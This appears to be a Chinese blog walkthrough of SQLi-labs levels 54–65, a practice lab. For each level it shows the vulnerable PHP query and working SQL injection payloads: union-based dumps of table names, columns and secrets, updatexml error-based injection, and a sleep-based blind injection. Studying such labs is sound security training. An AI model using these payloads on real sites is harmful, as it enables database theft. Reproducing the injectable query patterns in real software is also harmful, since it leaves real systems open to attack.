第五十四关

题目给出了数据库名为challenges。

这一关是依旧字符型注入,但是尝试10次后,会强制更换表名等信息。所以尽量在认真思考后进行尝试

爆表名

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

爆列名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='rnb0t4p7iq'--+

爆数据

?id=-1' union select 1,2,group_concat(id,0x3a,sessid,0x3a,secret_M7ZR,0x3a,tryy) from challenges.rnb0t4p7iq--+

将得到的密码,也就是secret_M7ZR里面的数据进行提交验证。当然表名、列名等信息会不同的。

第五十五关

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

除了单引号变为右括号和本关能尝试14次以外,其他同54关没有区别。

第五十六关

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

同54、55关差不多,只是需要')闭合,当然,也可以尝试14次。

第五十七关

$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

同54关差不多,只是需要双引号闭合。也可以尝试14次。

第五十八关

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

这一关无法使用union联合注入,所以考虑使用报错注入。

爆表名

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

爆列名

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='gshmaxznyj'),0x7e),1)--+

爆数据

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(secret_IWPF) from challenges.gshmaxznyj),0x7e),1)--+

第五十九关

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

相比于58关没有单引号而已。

第六十关

$id = '("'.$id.'")';

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

用")来闭合,其他一样。

第六十一关

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";

用'))来闭合,其他一样。

第六十二关

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

union联合注入和报错注入都没法用了。盲注,太灵性了,最多130次机会,可以用延迟注入慢慢试。

payload:

?id=1')and If(left((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1)='q',sleep(6),0)--+

正确就延迟,错误不延迟。

第六十三关

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

单引号闭合。

第六十四关

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

))闭合。

第六十五关

$id = '"'.$id.'"';

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

")闭合。

最新文章

  1. SQL Server高级查询
  2. 2016/10/28 很久没更了 leetcode解题 3sumcloset
  3. 固定表头/锁定前几列的代码参考[JS篇]
  4. 如何通过XShell传输文件
  5. jwplayer直播
  6. Sobel边缘检测算法(转载)
  7. ios7新增基础类库以及OC新特性
  8. 小技巧之指定refer
  9. Win7下Boost库的安装
  10. WPF笔记(2.2 DockPanel)——Layout
  11. python实现词法分析
  12. tcpdump VS tshark用法(转)
  13. sed在行首或者行尾添加内容
  14. Thunk
  15. 【noip 2014】提高组Day2T3.华容道
  16. 在controller中将timestamp类型的数据通过toString()方法变成字符串
  17. Django模型层(2)
  18. java初学者必看的学习路线
  19. Vue.js学习笔记(一)
  20. 支撑大规模公有云的Kubernetes改进与优化 (1)

热门文章

  1. SpringMVC转发及重定向
  2. Vue自定义指令 数据传递
  3. Thymeleaf+SpringBoot+Mybatis实现的齐贤易游网旅游信息管理系统
  4. Ubuntu初次使用的问题
  5. tp5--路由的使用(初级)
  6. udp包最大数据长度是多少
  7. 【集群实战】Rsync试题-异机数据备份解决方案
  8. Netty(七):EventLoop学习前导——Reactor模式
  9. JeeSite 4.0 简化业务逻辑层开发
  10. 演示:配置日志发送到syslog日志服务器